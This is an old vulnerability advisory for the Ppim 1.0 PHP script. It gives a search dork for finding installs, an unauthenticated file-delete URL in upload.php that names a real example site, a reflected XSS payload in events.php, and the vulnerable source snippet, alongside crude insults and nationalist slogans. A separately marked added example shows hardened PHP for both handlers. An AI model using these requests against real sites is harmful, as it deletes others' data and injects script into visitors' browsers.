Ppim <= 1.0 (Arbitrary File Delete/XSS) Multiple Vulnerabilities

2008-10-06 / 2008-10-07
Credit: Djm-sut
Risk: High
Local: No
Remote: Yes
CWE: CWE-22

##########################################################
#Author : BeyazKurt
#Contact : Djm-sut@Hotmail.Com
#
#Script : Ppim v1.0 [What kind of script name is this, ffs :D ]
#Download : http://scripts.ringsworld.com/organizers/ppim.zip
#
# D0rk : inurl:events.php?listallevents
#
# File Delete Vulnerability: upload.php
#
# Example:http://creawebs.com.mx/sistema/upload.php?mode=delfile&file=Creando Wiki.pptx
# Exploit:http://SITE.COM/upload.php?mode=delfile&file=FileName
#
# $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
#
# XSS Vulnerability: events.php
#
#[CODE]
# <?php
# if (isset($_GET['date']))
# {
# $date_id = $_GET['date'];
# print "<a href=\"events.php?mode=new&date=$date_id\">New Event</a><br / >";
# }
# ?>
#[/CODE]
#
#Exploit :
# events.php?mode=new&date=XSS CODE
# events.php?mode=new&date="><script>alert('XSS')</script>
# -------------------------------
#
# INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H)
# pigs for dedication : : WE Are Don't Forget Kosova, Drenica, Srebrenica And All Genocide !!
# Proud 2 Be ALBANIAN
#
# MTK : 0 - 5 : FenerBahçe (H)
#
# Note : Fuck off pala! Damn lamer.
# Thnx : All Muslims Albanian & Turkish Coder.. And CrazyShark f0r translate.
#######################################################
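
Hardened counterparts to the two handlers named in the advisory, as an added example that is not Ppim's code and not from the advisory author. The upload directory, the YYYY-MM-DD date format, the session keys and all function names are assumptions, since the advisory shows no source for upload.php.

```php
<?php
// Added example, not Ppim's code. UPLOAD_DIR, the YYYY-MM-DD date format,
// and the session keys 'user_id' and 'csrf' are assumptions.
declare(strict_types=1);

const UPLOAD_DIR = __DIR__ . '/uploads';   // assumed storage directory

// events.php: allow-list the date, then encode for the URL and for HTML.
function new_event_link(string $date): string
{
    if (!preg_match('/^\d{4}-\d{2}-\d{2}$/D', $date)) {
        return '';
    }
    $href = 'events.php?mode=new&date=' . rawurlencode($date);
    return '<a href="' . htmlspecialchars($href, ENT_QUOTES, 'UTF-8') . '">New Event</a><br />';
}

// upload.php?mode=delfile: accept only a regular file directly in UPLOAD_DIR.
function resolve_deletable(string $name, string $dir = UPLOAD_DIR): ?string
{
    $base = realpath($dir);
    if ($base === false || $name === '' || strpos($name, "\0") !== false) {
        return null;
    }
    // basename() drops directory parts; realpath() resolves symlinks and "..".
    $path = realpath($base . DIRECTORY_SEPARATOR . basename($name));
    if ($path === false || dirname($path) !== $base || !is_file($path)) {
        return null;
    }
    return $path;
}

// Deleting is a state change: POST only, logged-in session, CSRF token.
function handle_delete(array $server, array $post, array $session): bool
{
    $token = (string)($session['csrf'] ?? '');
    $file  = $post['file'] ?? null;
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST' || empty($session['user_id'])
        || $token === '' || !is_string($file)
        || !hash_equals($token, (string)($post['csrf'] ?? ''))) {
        return false;
    }
    $path = resolve_deletable($file);
    return $path !== null && unlink($path);
}

if (PHP_SAPI === 'cli') {   // constructed inputs
    var_dump(new_event_link('2008-10-06'), new_event_link('"><script>'), resolve_deletable('../upload.php'));
}
```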

References:

http://xforce.iss.net/xforce/xfdb/44386
http://www.securityfocus.com/bid/30627
http://www.milw0rm.com/exploits/6215
http://secunia.com/advisories/31424

